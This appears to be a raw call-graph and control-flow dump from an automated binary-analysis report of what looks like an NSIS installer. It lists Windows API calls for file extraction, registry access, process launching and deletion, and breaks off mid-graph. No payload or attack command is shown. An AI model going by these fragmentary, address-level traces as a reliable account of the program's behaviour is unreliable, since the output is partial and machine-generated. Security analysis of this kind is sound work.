3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3813 403e74 3602->3813 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3614 403ac1 3605->3614 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3617 406722 3 API calls 3608->3617 3609->3608 3615 405a4d GetFileAttributesW 3609->3615 3611->3606 3618 405b6c 3612->3618 3619 405a2a 3613->3619 3668 4060e7 3614->3668 3620 405a59 3615->3620 3616 405a9c 3616->3604 3621 405a69 3617->3621 3618->3614 3624 403e95 19 API calls 3618->3624 3619->3607 3620->3608 3622 406751 2 API calls 3620->3622 3812 406009 lstrcpynW 3621->3812 3622->3608 3625 405b7d 3624->3625 3626 405b89 ShowWindow LoadLibraryW 3625->3626 3627 405c0c 3625->3627 3629 405ba8 LoadLibraryW 3626->3629 3630 405baf GetClassInfoW 3626->3630 3818 405047 OleInitialize 3627->3818 3629->3630 3631 405bc3 GetClassInfoW RegisterClassW 3630->3631 3632 405bd9 DialogBoxParamW 3630->3632 3631->3632 3634 40141d 80 API calls 3632->3634 3633 405c12 3635 405c16 3633->3635 3636 405c2e 3633->3636 3637 405c01 3634->3637 3635->3614 3639 40141d 80 API calls 3635->3639 3638 40141d 80 API calls 3636->3638 3637->3614 3638->3614 3639->3614 3641 403871 3640->3641 3642 403863 CloseHandle 3640->3642 3966 403c83 3641->3966 3642->3641 3648 405cb5 3647->3648 3649 403aef ExitProcess 3648->3649 3650 405ccb MessageBoxIndirectW 3648->3650 3650->3649 3651->3473 4023 406009 lstrcpynW 3652->4023 3654 40678f 3655 405d59 4 API calls 3654->3655 3656 406795 3655->3656 3657 406038 5 API calls 3656->3657 3664 403a97 3656->3664 3663 4067a5 3657->3663 3658 4067dd lstrlenW 3659 4067e4 3658->3659 3658->3663 3660 406722 3 API calls 3659->3660 3662 4067ea GetFileAttributesW 3660->3662 3661 4062d5 2 API calls 3661->3663 3662->3664 3663->3658 3663->3661 3663->3664 3665 406751 2 API calls 3663->3665 3664->3483 3666 406009 lstrcpynW 3664->3666 3665->3658 3666->3519 3667->3486 3669 406110 3668->3669 3670 4060f3 3668->3670 3672 406187 3669->3672 3673 40612d 3669->3673 3676 406104 3669->3676 3671 4060fd CloseHandle 3670->3671 3670->3676 3671->3676 3674 406190 lstrcatW lstrlenW WriteFile 3672->3674 3672->3676 3673->3674 3675 406136 GetFileAttributesW 3673->3675 3674->3676 4024 405e50 GetFileAttributesW CreateFileW 3675->4024 3676->3483 3678 406152 3678->3676 3679 406162 WriteFile 3678->3679 3680 40617c SetFilePointer 3678->3680 3679->3680 3680->3672 3681->3509 3682->3514 3683->3529 3697 406812 3684->3697 3685 406a7f 3686 403b6c DeleteFileW 3685->3686 4027 406009 lstrcpynW 3685->4027 3686->3527 3686->3529 3688 4068d3 GetVersion 3700 4068e0 3688->3700 3689 406a46 lstrlenW 3689->3697 3690 406805 10 API calls 3690->3689 3693 405ed3 3 API calls 3693->3700 3694 406952 GetSystemDirectoryW 3694->3700 3695 406965 GetWindowsDirectoryW 3695->3700 3696 406038 5 API calls 3696->3697 3697->3685 3697->3688 3697->3689 3697->3690 3697->3696 4025 405f51 wsprintfW 3697->4025 4026 406009 lstrcpynW 3697->4026 3698 406805 10 API calls 3698->3700 3699 4069df lstrcatW 3699->3697 3700->3693 3700->3694 3700->3695 3700->3697 3700->3698 3700->3699 3701 406999 SHGetSpecialFolderLocation 3700->3701 3701->3700 3702 4069b1 SHGetPathFromIDListW CoTaskMemFree 3701->3702 3702->3700 3704 4062fc 3 API calls 3703->3704 3705 406c6f 3704->3705 3707 406c90 3705->3707 4028 406a99 lstrcpyW 3705->4028 3707->3529 3709 405c7a 3708->3709 3710 405c6e CloseHandle 3708->3710 3709->3529 3710->3709 3712 40139d 80 API calls 3711->3712 3713 401432 3712->3713 3713->3495 3720 406045 3714->3720 3715 4060bb 3716 4060c1 CharPrevW 3715->3716 3718 4060e1 3715->3718 3716->3715 3717 4060ae CharNextW 3717->3715 3717->3720 3718->3549 3719 405d06 CharNextW 3719->3720 3720->3715 3720->3717 3720->3719 3721 40609a CharNextW 3720->3721 3722 4060a9 CharNextW 3720->3722 3721->3720 3722->3717 3724 4037ea CreateDirectoryW 3723->3724 3725 40673f lstrcatW 3723->3725 3726 405e7f 3724->3726 3725->3724 3727 405e8c GetTickCount GetTempFileNameW 3726->3727 3728 405ec2 3727->3728 3729 4037fe 3727->3729 3728->3727 3728->3729 3729->3475 3730->3556 3731->3558 3733 406760 3732->3733 3734 4035f3 3733->3734 3735 406766 CharPrevW 3733->3735 3736 406009 lstrcpynW 3734->3736 3735->3733 3735->3734 3736->3562 3738 403357 3737->3738 3738->3576 3740 4032f3 3739->3740 3741 4032db 3739->3741 3744 403303 GetTickCount 3740->3744 3745 4032fb 3740->3745 3742 4032e4 DestroyWindow 3741->3742 3743 4032eb 3741->3743 3742->3743 3743->3565 3747 403311 CreateDialogParamW ShowWindow 3744->3747 3748 403334 3744->3748 3774 406332 3745->3774 3747->3748 3748->3565 3750->3571 3753 403398 3751->3753 3752 4033c3 3755 403336 ReadFile 3752->3755 3753->3752 3785 403368 SetFilePointer 3753->3785 3756 4033ce 3755->3756 3757 4033e7 GetTickCount 3756->3757 3758 403518 3756->3758 3760 4033d2 3756->3760 3770 4033fa 3757->3770 3759 40351c 3758->3759 3764 403540 3758->3764 3761 403336 ReadFile 3759->3761 3760->3580 3761->3760 3762 403336 ReadFile 3762->3764 3763 403336 ReadFile 3763->3770 3764->3760 3764->3762 3765 40355f WriteFile 3764->3765 3765->3760 3766 403574 3765->3766 3766->3760 3766->3764 3768 40345c GetTickCount 3768->3770 3769 403485 MulDiv wsprintfW 3786 404f72 3769->3786 3770->3760 3770->3763 3770->3768 3770->3769 3772 4034c9 WriteFile 3770->3772 3778 407312 3770->3778 3772->3760 3772->3770 3773->3572 3775 40634f PeekMessageW 3774->3775 3776 406345 DispatchMessageW 3775->3776 3777 403301 3775->3777 3776->3775 3777->3565 3779 407332 3778->3779 3780 40733a 3778->3780 3779->3770 3780->3779 3781 4073c2 GlobalFree 3780->3781 3782 4073cb GlobalAlloc 3780->3782 3783 407443 GlobalAlloc 3780->3783 3784 40743a GlobalFree 3780->3784 3781->3782 3782->3779 3782->3780 3783->3779 3783->3780 3784->3783 3785->3752 3787 404f8b 3786->3787 3796 40502f 3786->3796 3788 404fa9 lstrlenW 3787->3788 3789 406805 18 API calls 3787->3789 3790 404fd2 3788->3790 3791 404fb7 lstrlenW 3788->3791 3789->3788 3793 404fe5 3790->3793 3794 404fd8 SetWindowTextW 3790->3794 3792 404fc9 lstrcatW 3791->3792 3791->3796 3792->3790 3795 404feb SendMessageW SendMessageW SendMessageW 3793->3795 3793->3796 3794->3793 3795->3796 3796->3770 3798 403ea9 3797->3798 3826 405f51 wsprintfW 3798->3826 3800 403f1d 3801 406805 18 API calls 3800->3801 3802 403f29 SetWindowTextW 3801->3802 3804 403f44 3802->3804 3803 403f5f 3803->3595 3804->3803 3805 406805 18 API calls 3804->3805 3805->3804 3806->3592 3808 405f07 RegQueryValueExW 3807->3808 3809 405989 3807->3809 3810 405f29 RegCloseKey 3808->3810 3809->3590 3809->3591 3810->3809 3812->3597 3827 406009 lstrcpynW 3813->3827 3815 403e88 3816 406722 3 API calls 3815->3816 3817 403e8e lstrcatW 3816->3817 3817->3616 3828 403daf 3818->3828 3820 40506a 3823 4062a3 11 API calls 3820->3823 3825 405095 3820->3825 3831 40139d 3820->3831 3821 403daf SendMessageW 3822 4050a5 OleUninitialize 3821->3822 3822->3633 3823->3820 3825->3821 3826->3800 3827->3815 3829 403dc7 3828->3829 3830 403db8 SendMessageW 3828->3830 3829->3820 3830->3829 3834 4013a4 3831->3834 3832 401410 3832->3820 3834->3832 3835 4013dd MulDiv SendMessageW 3834->3835 3836 4015a0 3834->3836 3835->3834 3837 4015fa 3836->3837 3916 40160c 3836->3916 3838 401601 3837->3838 3839 401742 3837->3839 3840 401962 3837->3840 3841 4019ca 3837->3841 3842 40176e 3837->3842 3843 401650 3837->3843 3844 4017b1 3837->3844 3845 401672 3837->3845 3846 401693 3837->3846 3847 401616 3837->3847 3848 4016d6 3837->3848 3849 401736 3837->3849 3850 401897 3837->3850 3851 4018db 3837->3851 3852 40163c 3837->3852 3853 4016bd 3837->3853 3837->3916 3866 4062a3 11 API calls 3838->3866 3858 401751 ShowWindow 3839->3858 3859 401758 3839->3859 3863 40145c 18 API calls 3840->3863 3856 40145c 18 API calls 3841->3856 3860 40145c 18 API calls 3842->3860 3943 4062a3 lstrlenW wvsprintfW 3843->3943 3949 40145c 3844->3949 3861 40145c 18 API calls 3845->3861 3946 401446 3846->3946 3855 40145c 18 API calls 3847->3855 3872 401446 18 API calls 3848->3872 3848->3916 3849->3916 3965 405f51 wsprintfW 3849->3965 3862 40145c 18 API calls 3850->3862 3867 40145c 18 API calls 3851->3867 3857 401647 PostQuitMessage 3852->3857 3852->3916 3854 4062a3 11 API calls 3853->3854 3869 4016c7 SetForegroundWindow 3854->3869 3870 40161c 3855->3870 3871 4019d1 SearchPathW 3856->3871 3857->3916 3858->3859 3873 401765 ShowWindow 3859->3873 3859->3916 3874 401775 3860->3874 3875 401678 3861->3875 3876 40189d 3862->3876 3877 401968 GetFullPathNameW 3863->3877 3866->3916 3868 4018e2 3867->3868 3880 40145c 18 API calls 3868->3880 3869->3916 3881 4062a3 11 API calls 3870->3881 3871->3916 3872->3916 3873->3916 3884 4062a3 11 API calls 3874->3884 3885 4062a3 11 API calls 3875->3885 3961 4062d5 FindFirstFileW 3876->3961 3887 40197f 3877->3887 3929 4019a1 3877->3929 3879 40169a 3889 4062a3 11 API calls 3879->3889 3890 4018eb 3880->3890 3891 401627 3881->3891 3893 401785 SetFileAttributesW 3884->3893 3894 401683 3885->3894 3911 4062d5 2 API calls 3887->3911 3887->3929 3888 4062a3 11 API calls 3896 4017c9 3888->3896 3897 4016a7 Sleep 3889->3897 3899 40145c 18 API calls 3890->3899 3900 404f72 25 API calls 3891->3900 3902 40179a 3893->3902 3893->3916 3909 404f72 25 API calls 3894->3909 3954 405d59 CharNextW CharNextW 3896->3954 3897->3916 3898 4019b8 GetShortPathNameW 3898->3916 3907 4018f5 3899->3907 3900->3916 3901 40139d 65 API calls 3901->3916 3908 4062a3 11 API calls 3902->3908 3903 4018c2 3912 4062a3 11 API calls 3903->3912 3904 4018a9 3910 4062a3 11 API calls 3904->3910 3914 4062a3 11 API calls 3907->3914 3908->3916 3909->3916 3910->3916 3915 401991 3911->3915 3912->3916 3913 4017d4 3917 401864 3913->3917 3920 405d06 CharNextW 3913->3920 3938 4062a3 11 API calls 3913->3938 3918 401902 MoveFileW 3914->3918 3915->3929 3964 406009 lstrcpynW 3915->3964 3916->3834 3917->3894 3919 40186e 3917->3919 3921 401912 3918->3921 3922 40191e 3918->3922 3923 404f72 25 API calls 3919->3923 3925 4017e6 CreateDirectoryW 3920->3925 3921->3894 3927 401942 3922->3927 3932 4062d5 2 API calls 3922->3932 3928 401875 3923->3928 3925->3913 3926 4017fe GetLastError 3925->3926 3930 401827 GetFileAttributesW 3926->3930 3931 40180b GetLastError 3926->3931 3937 4062a3 11 API calls 3927->3937 3960 406009 lstrcpynW 3928->3960 3929->3898 3929->3916 3930->3913 3934 4062a3 11 API calls 3931->3934 3935 401929 3932->3935 3934->3913 3935->3927 3940 406c68 42 API calls 3935->3940 3936 401882 SetCurrentDirectoryW 3936->3916 3939 40195c 3937->3939 3938->3913 3939->3916 3941 401936 3940->3941 3942 404f72 25 API calls 3941->3942 3942->3927 3944 4060e7 9 API calls 3943->3944 3945 401664 3944->3945 3945->3901 3947 406805 18 API calls 3946->3947 3948 401455 3947->3948 3948->3879 3950 406805 18 API calls 3949->3950 3951 401488 3950->3951 3952 401497 3951->3952 3953 406038 5 API calls 3951->3953 3952->3888 3953->3952 3955 405d76 3954->3955 3956 405d88 3954->3956 3955->3956 3957 405d83 CharNextW 3955->3957 3958 405dac 3956->3958 3959 405d06 CharNextW 3956->3959 3957->3958 3958->3913 3959->3956 3960->3936 3962 4018a5 3961->3962 3963 4062eb FindClose 3961->3963 3962->3903 3962->3904 3963->3962 3964->3929 3965->3916 3967 403c91 3966->3967 3968 403876 3967->3968 3969 403c96 FreeLibrary GlobalFree 3967->3969 3970 406c9b 3968->3970 3969->3968 3969->3969 3971 40677e 18 API calls 3970->3971 3972 406cae 3971->3972 3973 406cb7 DeleteFileW 3972->3973 3974 406cce 3972->3974 4014 403882 OleUninitialize 3973->4014 3975 406e4b 3974->3975 4018 406009 lstrcpynW 3974->4018 3981 4062d5 2 API calls 3975->3981 4003 406e58 3975->4003 3975->4014 3977 406cf9 3978 406d03 lstrcatW 3977->3978 3979 406d0d 3977->3979 3980 406d13 3978->3980 3982 406751 2 API calls 3979->3982 3984 406d23 lstrcatW 3980->3984 3985 406d19 3980->3985 3983 406e64 3981->3983 3982->3980 3988 406722 3 API calls 3983->3988 3983->4014 3987 406d2b lstrlenW FindFirstFileW 3984->3987 3985->3984 3985->3987 3986 4062a3 11 API calls 3986->4014 3989 406e3b 3987->3989 3993 406d52 3987->3993 3990 406e6e 3988->3990 3989->3975 3992 4062a3 11 API calls 3990->3992 3991 405d06 CharNextW 3991->3993 3994 406e79 3992->3994 3993->3991 3997 406e18 FindNextFileW 3993->3997 4006 406c9b 72 API calls 3993->4006 4013 404f72 25 API calls 3993->4013 4015 4062a3 11 API calls 3993->4015 4016 404f72 25 API calls 3993->4016 4017 406c68 42 API calls 3993->4017 4019 406009 lstrcpynW 3993->4019 4020 405e30 GetFileAttributesW 3993->4020 3995 405e30 2 API calls 3994->3995 3996 406e81 RemoveDirectoryW 3995->3996 4000 406ec4 3996->4000 4001 406e8d 3996->4001 3997->3993 3999 406e30 FindClose 3997->3999 3999->3989 4002 404f72 25 API calls 4000->4002 4001->4003 4004 406e93 4001->4004 4002->4014 4003->3986 4005 4062a3 11 API calls 4004->4005 4007 406e9d 4005->4007 4006->3993 4009 404f72 25 API calls 4007->4009 4011 406ea7 4009->4011 4012 406c68 42 API calls 4011->4012 4012->4014 4013->3997 4014->3491 4014->3492 4015->3993 4016->3993 4017->3993 4018->3977 4019->3993 4021 405e4d DeleteFileW 4020->4021 4022 405e3f SetFileAttributesW 4020->4022 4021->3993 4022->4021 4023->3654 4024->3678 4025->3697 4026->3697 4027->3686 4029 406ae7 GetShortPathNameW 4028->4029 4030 406abe 4028->4030 4031 406b00 4029->4031 4032 406c62 4029->4032 4054 405e50 GetFileAttributesW CreateFileW 4030->4054 4031->4032 4034 406b08 WideCharToMultiByte 4031->4034 4032->3707 4034->4032 4036 406b25 WideCharToMultiByte 4034->4036 4035 406ac7 CloseHandle GetShortPathNameW 4035->4032 4037 406adf 4035->4037 4036->4032 4038 406b3d wsprintfA 4036->4038 4037->4029 4037->4032 4039 406805 18 API calls 4038->4039 4040 406b69 4039->4040 4055 405e50 GetFileAttributesW CreateFileW 4040->4055 4042 406b76 4042->4032 4043 406b83 GetFileSize GlobalAlloc 4042->4043 4044 406ba4 ReadFile 4043->4044 4045 406c58 CloseHandle 4043->4045 4044->4045 4046 406bbe 4044->4046 4045->4032 4046->4045 4056 405db6 lstrlenA 4046->4056 4049 406bd7 lstrcpyA 4052 406bf9 4049->4052 4050 406beb 4051 405db6 4 API calls 4050->4051 4051->4052 4053 406c30 SetFilePointer WriteFile GlobalFree 4052->4053 4053->4045 4054->4035 4055->4042 4057 405df7 lstrlenA 4056->4057 4058 405dd0 lstrcmpiA 4057->4058 4059 405dff 4057->4059 4058->4059 4060 405dee CharNextA 4058->4060 4059->4049 4059->4050 4060->4057 4921 402a84 4922 401553 19 API calls 4921->4922 4923 402a8e 4922->4923 4924 401446 18 API calls 4923->4924 4925 402a98 4924->4925 4926 401a13 4925->4926 4927 402ab2 RegEnumKeyW 4925->4927 4928 402abe RegEnumValueW 4925->4928 4929 402a7e 4927->4929 4928->4926 4928->4929 4929->4926 4930 4029e4 RegCloseKey 4929->4930 4930->4926 4931 402c8a 4932 402ca2 4931->4932 4933 402c8f 4931->4933 4935 40145c 18 API calls 4932->4935 4934 401446 18 API calls 4933->4934 4937 402c97 4934->4937 4936 402ca9 lstrlenW 4935->4936 4936->4937 4938 402ccb WriteFile 4937->4938 4939 401a13 4937->4939 4938->4939 4940 40400d 4941 40406a 4940->4941 4942 40401a lstrcpynA lstrlenA 4940->4942 4942->4941 4943 40404b 4942->4943 4943->4941 4944 404057 GlobalFree 4943->4944 4944->4941 4945 401d8e 4946 40145c 18 API calls 4945->4946 4947 401d95 ExpandEnvironmentStringsW 4946->4947 4948 401da8 4947->4948 4950 401db9 4947->4950 4949 401dad lstrcmpW 4948->4949 4948->4950 4949->4950 4951 401e0f 4952 401446 18 API calls 4951->4952 4953 401e17 4952->4953 4954 401446 18 API calls 4953->4954 4955 401e21 4954->4955 4956 4030e3 4955->4956 4958 405f51 wsprintfW 4955->4958 4958->4956 4959 402392 4960 40145c 18 API calls 4959->4960 4961 402399 4960->4961 4964 4071f8 4961->4964 4965 406ed2 25 API calls 4964->4965 4966 407218 4965->4966 4967 407222 lstrcpynW lstrcmpW 4966->4967 4968 4023a7 4966->4968 4969 407254 4967->4969 4970 40725a lstrcpynW 4967->4970 4969->4970 4970->4968 4971 402713 4986 406009 lstrcpynW 4971->4986 4973 40272c 4987 406009 lstrcpynW 4973->4987 4975 402738 4976 40145c 18 API calls 4975->4976 4978 402743 4975->4978 4976->4978 4977 402752 4980 40145c 18 API calls 4977->4980 4982 402761 4977->4982 4978->4977 4979 40145c 18 API calls 4978->4979 4979->4977 4980->4982 4981 40145c 18 API calls 4983 40276b 4981->4983 4982->4981 4984 4062a3 11 API calls 4983->4984 4985 40277f WritePrivateProfileStringW 4984->4985 4986->4973 4987->4975 4988 402797 4989 40145c 18 API calls 4988->4989 4990 4027ae 4989->4990 4991 40145c 18 API calls 4990->4991 4992 4027b7 4991->4992 4993 40145c 18 API calls 4992->4993 4994 4027c0 GetPrivateProfileStringW lstrcmpW 4993->4994 4995 402e18 4996 40145c 18 API calls 4995->4996 4997 402e1f FindFirstFileW 4996->4997 4998 402e32 4997->4998 5003 405f51 wsprintfW 4998->5003 5000 402e43 5004 406009 lstrcpynW 5000->5004 5002 402e50 5003->5000 5004->5002 5005 401e9a 5006 40145c 18 API calls 5005->5006 5007 401ea1 5006->5007 5008 401446 18 API calls 5007->5008 5009 401eab wsprintfW 5008->5009 4110 401a1f 4111 40145c 18 API calls 4110->4111 4112 401a26 4111->4112 4113 4062a3 11 API calls 4112->4113 4114 401a49 4113->4114 4115 401a64 4114->4115 4116 401a5c 4114->4116 4164 406009 lstrcpynW 4115->4164 4163 406009 lstrcpynW 4116->4163 4119 401a62 4123 406038 5 API calls 4119->4123 4120 401a6f 4121 406722 3 API calls 4120->4121 4122 401a75 lstrcatW 4121->4122 4122->4119 4125 401a81 4123->4125 4124 4062d5 2 API calls 4124->4125 4125->4124 4126 405e30 2 API calls 4125->4126 4128 401a98 CompareFileTime 4125->4128 4129 401ba9 4125->4129 4133 4062a3 11 API calls 4125->4133 4137 406009 lstrcpynW 4125->4137 4143 406805 18 API calls 4125->4143 4150 405ca0 MessageBoxIndirectW 4125->4150 4154 401b50 4125->4154 4161 401b5d 4125->4161 4162 405e50 GetFileAttributesW CreateFileW 4125->4162 4126->4125 4128->4125 4130 404f72 25 API calls 4129->4130 4132 401bb3 4130->4132 4131 404f72 25 API calls 4134 401b70 4131->4134 4135 40337f 37 API calls 4132->4135 4133->4125 4138 4062a3 11 API calls 4134->4138 4136 401bc6 4135->4136 4139 4062a3 11 API calls 4136->4139 4137->4125 4145 401b8b 4138->4145 4140 401bda 4139->4140 4141 401be9 SetFileTime 4140->4141 4142 401bf8 FindCloseChangeNotification 4140->4142 4141->4142 4144 401c09 4142->4144 4142->4145 4143->4125 4146 401c21 4144->4146 4147 401c0e 4144->4147 4149 406805 18 API calls 4146->4149 4148 406805 18 API calls 4147->4148 4151 401c16 lstrcatW 4148->4151 4152 401c29 4149->4152 4150->4125 4151->4152 4153 4062a3 11 API calls 4152->4153 4155 401c34 4153->4155 4156 401b93 4154->4156 4157 401b53 4154->4157 4158 405ca0 MessageBoxIndirectW 4155->4158 4159 4062a3 11 API calls 4156->4159 4160 4062a3 11 API calls 4157->4160 4158->4145 4159->4145 4160->4161 4161->4131 4162->4125 4163->4119 4164->4120 5010 40209f GetDlgItem GetClientRect 5011 40145c 18 API calls 5010->5011 5012 4020cf LoadImageW SendMessageW 5011->5012 5013 4030e3 5012->5013 5014 4020ed DeleteObject 5012->5014 5014->5013 5015 402b9f 5016 401446 18 API calls 5015->5016 5021 402ba7 5016->5021 5017 402c4a 5018 402bdf ReadFile 5020 402c3d 5018->5020 5018->5021 5019 401446 18 API calls 5019->5020 5020->5017 5020->5019 5027 402d17 ReadFile 5020->5027 5021->5017 5021->5018 5021->5020 5022 402c06 MultiByteToWideChar 5021->5022 5023 402c3f 5021->5023 5025 402c4f 5021->5025 5022->5021 5022->5025 5028 405f51 wsprintfW 5023->5028 5025->5020 5026 402c6b SetFilePointer 5025->5026 5026->5020 5027->5020 5028->5017 5029 402b23 GlobalAlloc 5030 402b39 5029->5030 5031 402b4b 5029->5031 5032 401446 18 API calls 5030->5032 5033 40145c 18 API calls 5031->5033 5034 402b41 5032->5034 5035 402b52 WideCharToMultiByte lstrlenA 5033->5035 5036 402b93 5034->5036 5037 402b84 WriteFile 5034->5037 5035->5034 5037->5036 5038 402384 GlobalFree 5037->5038 5038->5036 5040 4044a5 5041 404512 5040->5041 5042 4044df 5040->5042 5044 40451f GetDlgItem GetAsyncKeyState 5041->5044 5051 4045b1 5041->5051 5108 405c84 GetDlgItemTextW 5042->5108 5047 40453e GetDlgItem 5044->5047 5054 40455c 5044->5054 5045 4044ea 5048 406038 5 API calls 5045->5048 5046 40469d 5106 404833 5046->5106 5110 405c84 GetDlgItemTextW 5046->5110 5049 403d3f 19 API calls 5047->5049 5050 4044f0 5048->5050 5053 404551 ShowWindow 5049->5053 5056 403e74 5 API calls 5050->5056 5051->5046 5057 406805 18 API calls 5051->5057 5051->5106 5053->5054 5059 404579 SetWindowTextW 5054->5059 5064 405d59 4 API calls 5054->5064 5055 403dca 8 API calls 5060 404847 5055->5060 5061 4044f5 GetDlgItem 5056->5061 5062 40462f SHBrowseForFolderW 5057->5062 5058 4046c9 5063 40677e 18 API calls 5058->5063 5065 403d3f 19 API calls 5059->5065 5066 404503 IsDlgButtonChecked 5061->5066 5061->5106 5062->5046 5067 404647 CoTaskMemFree 5062->5067 5068 4046cf 5063->5068 5069 40456f 5064->5069 5070 404597 5065->5070 5066->5041 5071 406722 3 API calls 5067->5071 5111 406009 lstrcpynW 5068->5111 5069->5059 5075 406722 3 API calls 5069->5075 5072 403d3f 19 API calls 5070->5072 5073 404654 5071->5073 5076 4045a2 5072->5076 5077 40468b SetDlgItemTextW 5073->5077 5082 406805 18 API calls 5073->5082 5075->5059 5109 403d98 SendMessageW 5076->5109 5077->5046 5078 4046e6 5080 4062fc 3 API calls 5078->5080 5089 4046ee 5080->5089 5081 4045aa 5085 4062fc 3 API calls 5081->5085 5083 404673 lstrcmpiW 5082->5083 5083->5077 5086 404684 lstrcatW 5083->5086 5084 404730 5112 406009 lstrcpynW 5084->5112 5085->5051 5086->5077 5088 404739 5090 405d59 4 API calls 5088->5090 5089->5084 5094 406751 2 API calls 5089->5094 5095 404785 5089->5095 5091 40473f GetDiskFreeSpaceW 5090->5091 5093 404763 MulDiv 5091->5093 5091->5095 5093->5095 5094->5089 5097 4047e2 5095->5097 5098 4043ad 21 API calls 5095->5098 5096 404805 5113 403d85 EnableWindow 5096->5113 5097->5096 5099 40141d 80 API calls 5097->5099 5100 4047d3 5098->5100 5099->5096 5102 4047e4 SetDlgItemTextW 5100->5102 5103 4047d8 5100->5103 5102->5097 5104 4043ad 21 API calls 5103->5104 5104->5097 5105 404821 5105->5106 5114 403d61 5105->5114 5106->5055 5108->5045 5109->5081 5110->5058 5111->5078 5112->5088 5113->5105 5115 403d74 SendMessageW 5114->5115 5116 403d6f 5114->5116 5115->5106 5116->5115 5117 402da5 5118 4030e3 5117->5118 5119 402dac 5117->5119 5120 401446 18 API calls 5119->5120 5121 402db8 5120->5121 5122 402dbf SetFilePointer 5121->5122 5122->5118 5123 402dcf 5122->5123 5123->5118 5125 405f51 wsprintfW 5123->5125 5125->5118 5126 4030a9 SendMessageW 5127 4030c2 InvalidateRect 5126->5127 5128 4030e3 5126->5128 5127->5128 5129 401cb2 5130 40145c 18 API calls 5129->5130 5131 401c54 5130->5131 5132 4062a3 11 API calls 5131->5132 5135 401c64 5131->5135 5133 401c59 5132->5133 5134 406c9b 81 API calls 5133->5134 5134->5135 4061 4021b5 4062 40145c 18 API calls 4061->4062 4063 4021bb 4062->4063 4064 40145c 18 API calls 4063->4064 4065 4021c4 4064->4065 4066 40145c 18 API calls 4065->4066 4067 4021cd 4066->4067 4068 40145c 18 API calls 4067->4068 4069 4021d6 4068->4069 4070 404f72 25 API calls 4069->4070 4071 4021e2 ShellExecuteW 4070->4071 4072 40221b 4071->4072 4073 40220d 4071->4073 4075 4062a3 11 API calls 4072->4075 4074 4062a3 11 API calls 4073->4074 4074->4072 4076 402230 4075->4076 5143 402238 5144 40145c 18 API calls 5143->5144 5145 40223e 5144->5145 5146 4062a3 11 API calls 5145->5146 5147 40224b 5146->5147 5148 404f72 25 API calls 5147->5148 5149 402255 5148->5149 5150 405c3f 2 API calls 5149->5150 5151 40225b 5150->5151 5152 4062a3 11 API calls 5151->5152 5155 4022ac CloseHandle 5151->5155 5158 40226d 5152->5158 5154 4030e3 5155->5154 5156 402283 WaitForSingleObject 5157 402291 GetExitCodeProcess 5156->5157 5156->5158 5157->5155 5160 4022a3 5157->5160 5158->5155 5158->5156 5159 406332 2 API calls 5158->5159 5159->5156 5162 405f51 wsprintfW 5160->5162 5162->5155 5163 4040b8 5164 4040d3 5163->5164 5172 404201 5163->5172 5168 40410e 5164->5168 5194 403fca WideCharToMultiByte 5164->5194 5165 40426c 5166 404276 GetDlgItem 5165->5166 5167 40433e 5165->5167 5169 404290 5166->5169 5170 4042ff 5166->5170 5173 403dca 8 API calls 5167->5173 5175 403d3f 19 API calls 5168->5175 5169->5170 5178 4042b6 6 API calls 5169->5178 5170->5167 5179 404311 5170->5179 5172->5165 5172->5167 5174 40423b GetDlgItem SendMessageW 5172->5174 5177 404339 5173->5177 5199 403d85 EnableWindow 5174->5199 5176 40414e 5175->5176 5181 403d3f 19 API calls 5176->5181 5178->5170 5182 404327 5179->5182 5183 404317 SendMessageW 5179->5183 5186 40415b CheckDlgButton 5181->5186 5182->5177 5187 40432d SendMessageW 5182->5187 5183->5182 5184 404267 5185 403d61 SendMessageW 5184->5185 5185->5165 5197 403d85 EnableWindow 5186->5197 5187->5177 5189 404179 GetDlgItem 5198 403d98 SendMessageW 5189->5198 5191 40418f SendMessageW 5192 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5191->5192 5193 4041ac GetSysColor 5191->5193 5192->5177 5193->5192 5195 404007 5194->5195 5196 403fe9 GlobalAlloc WideCharToMultiByte 5194->5196 5195->5168 5196->5195 5197->5189 5198->5191 5199->5184 4077 401eb9 4078 401f24 4077->4078 4079 401ec6 4077->4079 4080 401f53 GlobalAlloc 4078->4080 4081 401f28 4078->4081 4082 401ed5 4079->4082 4089 401ef7 4079->4089 4083 406805 18 API calls 4080->4083 4088 4062a3 11 API calls 4081->4088 4093 401f36 4081->4093 4084 4062a3 11 API calls 4082->4084 4087 401f46 4083->4087 4085 401ee2 4084->4085 4090 402708 4085->4090 4095 406805 18 API calls 4085->4095 4087->4090 4091 402387 GlobalFree 4087->4091 4088->4093 4099 406009 lstrcpynW 4089->4099 4091->4090 4101 406009 lstrcpynW 4093->4101 4094 401f06 4100 406009 lstrcpynW 4094->4100 4095->4085 4097 401f15 4102 406009 lstrcpynW 4097->4102 4099->4094 4100->4097 4101->4087 4102->4090 5200 4074bb 5202 407344 5200->5202 5201 407c6d 5202->5201 5203 4073c2 GlobalFree 5202->5203 5204 4073cb GlobalAlloc 5202->5204 5205 407443 GlobalAlloc 5202->5205 5206 40743a GlobalFree 5202->5206 5203->5204 5204->5201 5204->5202 5205->5201 5205->5202 5206->5205

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 7 403923-403937 call 405d06 CharNextW 0->7 8 40391b-40391e 0->8 11 4039ca-4039d0 7->11 8->7 12 4039d6 11->12 13 40393c-403942 11->13 14 4039f5-403a0d GetTempPathW call 4037cc 12->14 15 403944-40394a 13->15 16 40394c-403950 13->16 23 403a33-403a4d DeleteFileW call 403587 14->23 24 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 14->24 15->15 15->16 18 403952-403957 16->18 19 403958-40395c 16->19 18->19 21 4039b8-4039c5 call 405d06 19->21 22 40395e-403965 19->22 21->11 37 4039c7 21->37 26 403967-40396e 22->26 27 40397a-40398c call 403800 22->27 40 403acc-403adb call 403859 OleUninitialize 23->40 41 403a4f-403a55 23->41 24->23 24->40 28 403970-403973 26->28 29 403975 26->29 38 4039a1-4039b6 call 403800 27->38 39 40398e-403995 27->39 28->27 28->29 29->27 37->11 38->21 56 4039d8-4039f0 call 407d6e call 406009 38->56 43 403997-40399a 39->43 44 40399c 39->44 